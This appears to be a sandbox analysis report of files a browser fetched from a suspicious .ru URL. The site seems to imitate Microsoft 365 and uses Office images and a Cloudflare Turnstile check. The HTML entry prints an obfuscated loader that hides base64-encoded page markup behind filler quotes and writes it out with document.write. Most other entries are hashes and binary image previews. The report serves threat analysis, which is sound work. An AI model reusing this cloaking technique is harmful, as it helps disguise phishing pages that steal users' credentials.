                                                                                        Preview:.PNG........IHDR.......).......Fw....pHYs.................sRGB.........gAMA......a....`IDATx.........G.l.$...h..D..(.J*m..HZP.....%YS.d-Q....Fv!.`..y.s.}.;wf.sg.s?..y..=...|..<.s.M.d..3...{.......sgIcL.......t..>../Y.d..ko.(..g.I.B.J....={Z......H...&o...-.X....;>s_Xr.../..pL.5j...&L.%.IJJ.8r..x....^.4h0.p..W.t.M;".....Uj.....**[.y.fQE&q.>(. .r..7'.Y.G.&M....:thO.6$#^..;..\|$.b....~.i.F...V../Y[..(`Z.l.4x..[....(....}..3$.8.....*.>b...=..F.[.u..5.6l....Cbb...4(Ae..N.:....._..a.r.E5.......(....{.W_}%...\.re...*. ..5k.Z.R.....?;.....Byx..Pa).n.........Q....G..{.....y.H6.`...s<....t.I.-.../g.y.\x.r.i.Y"....>....]Z2..n.M.V.*Y.K..D...J.#:...]t.....3.|..F.....9.cR...C."ER....+.~..G.;.<+.~P..\...G:..x..q.....o.bfp.UW.....~Xz..)D.*V.(.....}...&...[.:.,..4.$.^{....W\!......n..|..........7o../..9.h.G.....c...2e.-..&.+s..e*).'O......E.1....S..:+V....I.:u.{....~.W_}U>..C...'.h..q.<.....~..g9.O..h.1c...n.....h....f..N{...mq.v..gXk.?..Y.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with very long lines (15541), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):36087
                                                                                        Entropy (8bit):5.777874465863699
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:R5jsIeeWvgGKsFHUxqZERpybgshY/E45jsIeeWvgGKsFHUxqZERpybgshY4lrtlO:RGIevvTKkHUcopykq4GIevvTKkHUcopV
                                                                                        MD5:5C5BF7775B83D0A5C6C055BA67CC0C66
                                                                                        SHA1:A459BF5AF226E54AE27F9D5499650EF0C7994C7C
                                                                                        SHA-256:89FD4A6D6CAF289B4689B1F92E7F3C42E31671C292CBA84174148ADD682D9C11
                                                                                        SHA-512:FB23D1D7CFAAC1F5862102056047D925E24F3945580FCDDA29AB7DE517C7BA8CE47C79E70EF255CB161E783A8CFDE3C2F02ECB07B4C457F7D733B167E0E343FE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://dva.dgkifyron.ru/ncn6/
                                                                                        Preview: Success is not built on success. It&#039;s built on failure. It&#039;s built on frustration. Sometimes it&#039;s built on catastrophe. -->.. The road to success and the road to failure are almost exactly the same. -->..<script>../* Success is not in what you have, but who you are. */..if(atob("aHR0cHM6Ly9EVmEuZGdraWZ5cm9uLnJ1L25jbjYv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPH
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 76 x 99, 8-bit/color RGB, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):4.068159130770307
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPlRctnlTqB/xl/k4E08up:6v/lhPAtlmR7Tp
                                                                                        MD5:763F19759CCBE7AFE90B07FA4C0729C1
                                                                                        SHA1:4C54D839FE94E3E33613140001EA10D4092FA726
                                                                                        SHA-256:139F5E5A4B50BCE5D745C104B8A34560E924A756867B3EAC9F6EB5CE2A18F28F
                                                                                        SHA-512:8537DC206CA7CC4AAC846425A15C1E189AD27594E7E68FFBD651CA0C225D56F47003667AE2476961D6882AA8F5FFFCBF233A67F39DAF7B4D63D4760A62D2D882
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...L...c.......q.....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1598 x 899, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):1236532
                                                                                        Entropy (8bit):7.99453807364983
                                                                                        Encrypted:true
                                                                                        SSDEEP:24576:3IR94Q7f3YaeokAGfdoICPLOHpob3i8/eCsjNKSOyP82Rx7BiVQFMqna:3IR9hz3OyedoZyHpyzer023BieKqa
                                                                                        MD5:EAFC3935A3559F15248B9409658D978F
                                                                                        SHA1:46242446924C4DB9208646689119EFACFF1C93FD
                                                                                        SHA-256:B38F5C1FD010828E2DFC90300D3C2AB93DF49CF75C758BBBFF6B0A987D64C448
                                                                                        SHA-512:A1F345BFA3D85C7436E5F8EC6DA3147779BC903B6E59B24732C1302AEE8366B6E60D5F3281022485E4580B22D440AF80798010E06B0E2639BEB0DBE357347B7E
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...>...........x1....pHYs.................sRGB.........gAMA......a.....IDATx...W.m....1W^;.|.n..n.K...&...).Y.(.l.....a....~1l.O._...~4.`..m..!AjB.(..@R......7T<g..g...XkW..'V........s......WU .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ..D................o'bl...@ .....@ .....@ .....@ ......M....E.E<'}...r.g..Z...Ws..1.^.~.m.S_..*e..{...x.c..4/....x.{|..gA...s.g.S/.,.2..,.....UAD1...@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ..../..$-..g...."..#.....*.#.B|.5.......2........Y..M..bL=...R.g.7y.{U....q...........>.....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ......B...|].}.HO.....Y.,.x......C.....m.j.#.!....{|.=...S.{<.^.=.km.e.|Y.H...g}'......<..Mc.E..w..J..*.w....@ .....@ .....@ .....@ .....*...E...z..o..._MD.......Q..W.....@ .....@ .....@ .....@ ...^.B/......~.|].._v.g
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1017 x 706, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):372407
                                                                                        Entropy (8bit):7.9920868023509675
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:Qua8gWRQXRaGDBt/Qc8ABKmSzu/8YbOHPiyjcXLVzXDJImOdeEd0YufcqoTU3Xw1:QuaW0bL/QcdBaxjc7xXDOmOdee0DcqU/
                                                                                        MD5:1B4C66938347FF70F6D2FA1173D0C09B
                                                                                        SHA1:8766438A8E7EE0E068BABA0042B0D97C7667CAE4
                                                                                        SHA-256:B59D05AA36BA301347E8E8D711A42452E925F6875ACE1409B056AD2B759C9317
                                                                                        SHA-512:C9C2733F7C0DCA56B13E9F08CFFCFE0BD836F97D4D8B28EA1BA57896B9B2342A570D1653059BDED922024C10F8842C85504BAFD650CABA52C9DBF380078CBDF7
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR.....................pHYs.........&.:4....sRGB.........gAMA......a....LIDATx..[.m[r.V5.\..o.....O...>}w..6.` ..lC0.....F..@..(..<.C.).....!..)....<$J"E....D...0...M.}.n.....9*sT.WUs..6....Q...Zk.9..5... .4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I..^b.4.7.q....W........F.mL.~.G..Q..$.X...............,..q.w...W..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2501 x 831, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):871456
                                                                                        Entropy (8bit):7.99321885800314
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:0gKYAG/kgSHCI1lCaBDevD+ht1s996/cZoCCejkEnK3eXJdcKyMn5A+dZLw:rQR/1l9evDGdEZRzgAJdB/DdZE
                                                                                        MD5:46B510EC8A77F53E8C201F8779D69E42
                                                                                        SHA1:A21718B5BA16FF1BC10C43FFE9F4823D5EB414B0
                                                                                        SHA-256:D7315CEF7F382EB88B09A82EB3D5F13564105D5CE8413888963699E4BB523895
                                                                                        SHA-512:17E5C09882E8700C731AFE807F98D30658058CB9AC74A60CD291C37F0242863A2FB524829D708867529A368463D5949097D25DA5C6E6CF87DE0F9B125CA614AC
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/m365-copilot-centric-value-commercial-46b510ec8a.png
                                                                                        Preview:.PNG........IHDR.......?.......(.....pHYs.................sRGB.........gAMA......a...K.IDATx.......y..>..}.].n-.R.$.%K.,#K.e....6.6.m.a9....0..=}.i...9s.9}.....{`.6....h....j......ZJ.Rm......%3&#3.'.}oI6.H.._.w.\"##"#.'..<".......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1034 x 719, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):449258
                                                                                        Entropy (8bit):7.987066102559051
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:d2GTMhzF8cPHvuBGMRBflaF7+smn+i0QuCPSSqjv:d2LZHPHWBrlaw5+HBCqNv
                                                                                        MD5:1858A1BEB780FEAFE4BBAC77F49ED237
                                                                                        SHA1:51B892F52A9A288E73578ADC6AA2C3E62C59A63B
                                                                                        SHA-256:C8119EE0CC14A582FB8BE25EE58C7DFA1D5D4DFE51C8665B03268196D2E5F0C7
                                                                                        SHA-512:5B2463CFCB7F5FAA4967739AF5D844BE569E22C1103BD7A1AC6DE5DEB42F0AC2E653404294DBE8CE65010E8DD1F4B846557AA16B022ACC4773981EDD754C518D
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR..............Q".....pHYs.........&.:4....sRGB.........gAMA......a.....IDATx...{.mIv....}...{.o.g.g.{f8.k.")r(.,F4ir..I.$G.L.!dG.%...r..!.8.$..8.......$H.......0lQ.dI.H.!..y.3.wwOw..;.*.j...s.E....5s.;g..kW..Z.[.Z.JdO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=..M...iO{...D.....=[z......{.~>...il.g...,}.......9.>..)..L./.../\.....A...I..g...=.iO{.....?Vi'.......o...;.<y%..?..rG.x.{..\..\.ww.....;O.]...9...>...w...{........x|..xx.:].s8d....!..,Y.. 9...o.9'..Z..;9.JI.%....'...Z6..j.P........Z......-..Jm..aI.0Ni....._.WW.Z.....R{._/7..{k.Wz.u.P..n..lW)...........]Z.K.7g.w...X..<....I..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2609 x 471, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):698616
                                                                                        Entropy (8bit):7.988990542773947
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:7B7J02MzM8uOZuft67QhY3HZuppyR3l6Pjk48XOIWoXZQikJSPU7NLRlg:s2MzOOZulaQhY39xMrhQWoXaiwSc7/y
                                                                                        MD5:A907814C618999761488552FF59ABE52
                                                                                        SHA1:9328DD8911EFD581DAF9F18649B687C683D93787
                                                                                        SHA-256:A85710F22BD11B8F228D8B7387F87E5A066FF7CAB256D9719D01881A00FD7CE8
                                                                                        SHA-512:8982B24CFC82EBD3A6E9DC0C6996B2E04963F60A248DF3EA1C89EFBA52D49E2A6660B0321F4A217BA8778B1D301C43C91598D450D22451EC0F393A38EB8786A4
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/more-apps-consumer-mreb-a907814c61.png
                                                                                        Preview:.PNG........IHDR...1..........Y.....pHYs.................sRGB.........gAMA......a.....IDATx...=.vG.&.E..|O...E.@. .P.CC#./.<.C{%S...B.d6...|..]o..b8.Z..5h-.......E.{>{.N......WF....V..p...<....'3.#..h.....?5..<.8..\[\9....oB.. ...8c>.........".~.....{......,w.y-...Q..A..9..#<....M2K..*}.,/.x.CiW2U..G...@.t.s."...k%}.4f.F:...C.-Q.#u.?R..."..y../...;~.Wxq}K. .n.Vr.p*.W..W=.G..G.n...i...|..E..,.?........]9.b..}...-../8.">...U\..6..-..i...xo.........e..u.=.............~.|.n...JZ.M.A_.._.e..7...L........S...O./.|S..|."o...........]\.q].jI.}.5.#M).............o....T..2.,......o.j...;...=.KY..t..e............w...W.... .............A..?.m\.=.../...y.....K..6.{._.._p...?.........?.s..?..\................w..O~...~..?..?k?...z...~k.|..Q.-.@)..o.i.~.a.f.w..>.....O<...+../...o.._....._.j.oso.t^.R..R..bj..M7.t.M7.t.M7.t.M7...D.6.}..g....'...N...../.l......2Wi_..u../~..W...........?w.o+y.tZ.wX.sU..?tL...g....T..j.mG?..C.........k..}..K...5.5.3=.s-.r.._....
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 161 x 160, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):3974
                                                                                        Entropy (8bit):7.902382111689997
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:ISobo+jDMIdb9KWszfIwrotnp7hVzMECexHrI1vuE2nvg5vzHJ3k:ISqo+jRAfTIwEtp7hy2HrA2vgNTVk
                                                                                        MD5:2BE9B68EED69AE75FBA5ED982D0FF25D
                                                                                        SHA1:BD6E134C0D87C52AC751555269A59796D5EABC55
                                                                                        SHA-256:8281E85E9FF70034913A38D9EAA6AF52ED98AB621300F0558E70A9BCEFF7246E
                                                                                        SHA-512:D72E1C8F52D65BBFE2ECDAF9E7A0C209F4F7C385B470DAB7C0979D3D5F1FF29EC14A5E92334676F560DFD22924B0FB983F43FB936EA23F812ED0C639896F8C60
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR.............d.......pHYs.................sRGB.........gAMA......a.....IDATx...u.<..E......B.....X. ... ..T.........X.......G.qf...<..p..u..\[.W#9..zS|..9s...(.?..R.]..9...>..W.v..gR.yS..={...X..eYo9....0J....2.Fu....?..kW...../_..z......?.....}..UT../N..n..X{........Wn.L9.8.........+W..M...)....................r.q...k.....T.4Q7..j..nhcj.&:.*>ST?...q%.4....Fu.N...!.~........'F}.......Mt3D...l..v..B...1u9.`...|...b4.~B........9.Q.sB.:..x,.e;..(.......J2.....I..G.Uo.u....~.z........?...I:.T......9.@..??.?.8.e...N..M.N:!~H.i...q,yG.{^.../Zs26{r1.;a.....c{!...`Q.....EyY...u.%<.k2..1....K.......72.Q...n|.x<."V.{..........w'.W.G.&..L..q.5.'.(8|..kfQ....!....?....Fulf..........9......l.6....+7a..(.h...a0..&........D ....Wk...4.....hY;'....[a....".NSW3.T.&./....9....1}....S.a{d.e..)..c.:.J|..f..I....P.\.?..%._X'...4h...%.../^..K....@....J..[..I....../.....x.0..@.%.q?....k.'.i.R...p.`.Ks@......1'.=Md.b%..P..'.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 4000 x 2238, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):10058400
                                                                                        Entropy (8bit):7.988307130589743
                                                                                        Encrypted:false
                                                                                        SSDEEP:196608:5nHCaQivyot0RWDNzjMqV8CoWF6UquVtmS7ycKUkQfaGG9:ZHCavyI0cDN0qV8rmguVwaKUffaGG9
                                                                                        MD5:7D5C104D8439CC4A1A9618391A52DFC2
                                                                                        SHA1:1EACDB703238FC270187A1A23AA77315EE475ED2
                                                                                        SHA-256:2AB1510CDB2FA03A8CAF6F2CC4A40EBB2B8218922A6AD1F640F4EDD9018E9144
                                                                                        SHA-512:73446F80AC5B2AB4DEE11CAE312D9486CDF1261DE7BB988F55A5C5269825773964857452705CA6B4B165DCA4DFFE7DD13531CA04804E61210DC950CED900C26F
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR................g....pHYs.................sRGB.........gAMA......a...z5IDATx.....&.&..J........;>..xt..{.....2.I...vu.....T.PJ.Z....K....Ep..16.r..+.........h9......5q.8.?.....0...|<Y@...y6..B..N./..yI....*e\.....d.MzN.X..V_.N..9..2.5.'A.-#...A4.._..S.|...u_.....J.gd.lR..........i.@y,.?.}[|..>.$p'..zi.#]emv%.!.cO...>.n8r..5..Ro.5.......h.....4.'...[....X....@[..U...v.?4D..4,;y>....r=..L...4\_p...r...~.,..<..r...3....!t._E....Ai....M3...'......z.hl#..j=...0.e;..F...9..9..._.....0..}..".k......`I.r...A...1....+.>.`.g...E..|...1.....!..3{=..s@.-1.....343u...)..Z.k..}u.c.....QG.xy.9;. ^...x..!.S....n..z....O.0.l........M..p?..{.o/...?-..?..,.2ur......[....].b.'C..V.&...e.w`..r..|o..;6.....k..9._.|.{{...'..O..7.g..zG.'.#...~...]....g.$.*.F........o..QI..ge{...8w.t.Z.'.:..!./.......x...:.1.s...'.......D....g.Q.*y.>>.-q... ......sH..........G........<H........S..y>.+......_'k...}........i.=e...kN'_I.:..~ZsY..t$o.C..&).0D...S.....
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 973 x 675, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):279269
                                                                                        Entropy (8bit):7.994566583539726
                                                                                        Encrypted:true
                                                                                        SSDEEP:3072:RiwpUTuOsjVbgT94HFlcTY+/+T8tDtnSTFaslpolHpMerO+lMbQfVwv6p1YH:XG+jB894HFGTVw8QgGbMY
                                                                                        MD5:8548B8B68D33DBF376420E679FC84996
                                                                                        SHA1:7A277E16B935833A6403DEAD1CF5A7661F20DB24
                                                                                        SHA-256:CDFE0542BE718F847059F73ABC6EF56387109AB760D5530046F2EF9EDB25ED31
                                                                                        SHA-512:AED4FD1D6EBACFBBECBCCAE8CF4F4F13319D355723CF16F830C315884FCDE9EDAA929E5EEF78A36006FC0412AB1224AF311906883BA7391DF7165D7F3D808E00
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-commercial-2-mreb-8548b8b68d.png
                                                                                        Preview:.PNG........IHDR.............'?.k....pHYs.........&.:4....sRGB.........gAMA......a...BzIDATx...[...u...1...>..bU.b..)..).%9.":blK.,..0....v...@.h4........~k.../...:p.8.a'...u.,Z$-.WU...?g........"e.UG..<..^...c.o..E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-..'.E........^...D.....J..|.9}........)}.zq..~..Y.O_........?.....=...}..s<..?....=.q{Vy....o\.=.~t.l~??......@;..s...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65394)
                                                                                        Category:dropped
                                                                                        Size (bytes):91802
                                                                                        Entropy (8bit):5.3603423050848615
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:C4F18VDgLMcb+0XbPN1xlJGFqCN3tcULcUoHfe:C4F18VDgLN9LN1mTn
                                                                                        MD5:CF5CC7F4B57526CC37893DCB83DED031
                                                                                        SHA1:E953783BE0A7894585778455AAE3D0DF094D6F29
                                                                                        SHA-256:3A790B6C0D26D7A4D292CB27F992EAFAFF42C37E9318B2AB704207039127FCB8
                                                                                        SHA-512:2320F9D7811CD773C1E5C2E95A31B39E9FF62A2FA7CA431975873DAB57AE42A75BA720D15AEB47FA2EA127D0766EB5AA15040CFFD04BF7A8CB8BCD7236069C40
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:/*!. * 1DS JS SDK Shared Analytics, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeControl3",s=(s=e)[c]=s[c]||{},l=(l=e)[c="oneDsMeControl"]=l[c]||{},e=s[i]=s[i]||{},f=e.v=e.v||[],c=l[i]=l[i]||{},d=c.v=c.v||[];for(t in(c.o=c.o||[]).push(o),n(r),r)s[t]=r[t],f[t]=u,l[t]=r[t],d[t]=u,(a.n=a.n||[]).push(t)}(this,function(e){"use strict";!function(e,n,t){var r=Object.defineProperty;if(r)try{return r(e,n,t)}catch(i){}typeof t.value!==undefined&&(e[n]=t.value)}(e,"__esModule",{value:!0});var y="function",m="object",se="undefined",C="prototype",I="hasOwnProperty",b=Object,S=b[C],x=b.assign,w=b.create,n=b.defineProperty,_=S[I],T=null;function O(e){e=!1===(e=void 0===e||e)?null:T;return e||((e=(e=(e=typeof globalThis!==se?globalThis:e)||typeof self===se?e:self)||typeof window===se?e:window)||typeof global===se||(e=global),T=e),e
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1600 x 1173, 8-bit/color RGB, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):147977
                                                                                        Entropy (8bit):7.894319832540058
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:ZQZdW2222222222222222222222222222228VOS0dxbxqJPRVcHivXT48tZaLoN8:ZUDVOZdxcWizPaecE7JxIOyPiQwv0
                                                                                        MD5:A5E0395B6BE3507BAFB8EE7A942BD44E
                                                                                        SHA1:57FB2F3618A33A34BF2F289EC597C478A41D90E6
                                                                                        SHA-256:4E5CD37C0BECC3183B5D8C11DBE03351F98BE082EE5D75702303BD2D14EF0A63
                                                                                        SHA-512:E87C920DED3D84EE3F9046D666479CCCD8FB8888A0A5D8047A9CACD07E63BCECC4FE8CBBBD32FC5736CCAEC13C3D21F96E29FD72230B1E97BD0F166E24B4E6F0
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://lh7-rt.googleusercontent.com/drawingsz/AHiSRb2vRX9yRkhsvHGfazZ72MIvhHTEE29fzvFIJ2wLbLb48Na1ZuKYqByE7N05I4x14kPzvPGpPC-E1sHLmtMPSMYYZFjYQ1a2lQEOxRYu2NvG2foDaSN72Eozfhv4l2hEccw?key=psfCeKuvwgTVf-bOGgtgC0jY
                                                                                        Preview:.PNG........IHDR...@.........{..E....sBIT.....O.....zTXtRaw profile type APP1....U.K..0.D.>E.0.X..S........r..2..1....>.>....x.........b..!PO.Y.H.Z.......qabTb.,..G.@8.j.'...O.R....d.Ia....j[.....,.d.... .IDATx...wx.W...s..nuK.e.....B.!$...M.%...v.~,u!.@X ..%.l.....S..^.&.z..n....C..U........<....33W.3.................S.........X....................................................................................................................................................................................................................................................................S..R.Tw......)H)Ou...L..X..')%........`..../..0A..X..........d..AU..6...,`.)..^y.DD.....x..r.......S.`..(j.m&..j.....Nw..]....1..z.X'6..q...D")..m'm[.,......MJ).4..<...i.+.....^....&o0.X....u.......B8.........p....4.6....^..4.)...a.M.....]M..u.D"!....J.h.ql'..{{c..}.i .t...\...d..m.V.K......8.)a.Zv.gF..jv....b.2..|.ey....Fc.a..I....b.S.S..YJ).u].M&..P.uUW...t...z..j{].m.04).
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (47691)
                                                                                        Category:downloaded
                                                                                        Size (bytes):47692
                                                                                        Entropy (8bit):5.4016459163756165
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                        MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                        SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                        SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                        SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1094 x 761, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):489526
                                                                                        Entropy (8bit):7.995720041871589
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:aKimPYeigxfUPOwwMSavIHHukSrlKdZmzrC41zbxJa9ZqHqqzM0pZAyeRLqtt3LP:aKPFyOziIHOEgz2izjDANRLsl+4H7
                                                                                        MD5:708BCC570AD4887E2C1854014B472FC0
                                                                                        SHA1:768539D7A0EF0061097FF3AE0895EE437D543A13
                                                                                        SHA-256:88A8CE64B7B33A367FC73338F5E319B3546DD782E0336CCA07D00A54B5C51DA0
